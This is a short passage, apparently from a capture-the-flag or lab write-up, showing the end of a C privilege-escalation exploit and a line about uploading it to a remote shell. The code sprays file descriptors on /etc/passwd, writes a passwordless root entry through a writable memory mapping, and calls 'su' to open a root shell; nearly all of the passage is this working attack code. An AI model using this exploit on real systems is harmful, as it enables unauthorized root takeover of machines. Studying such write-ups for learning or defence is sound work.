        spray_fds[i] = open("/etc/passwd", O_RDONLY);
    }
    // After: 2 fd 1 refcount (but writeable due to mmap)
    strcpy(file_mmap, "root::0:0:root:/root:/bin/sh\n");

    puts("[+] Finished! Open root shell...");
    puts("=======================");
    system("su");
    return 0;
}
Now, it’s time to upload the script to the remote shell and try to execute it.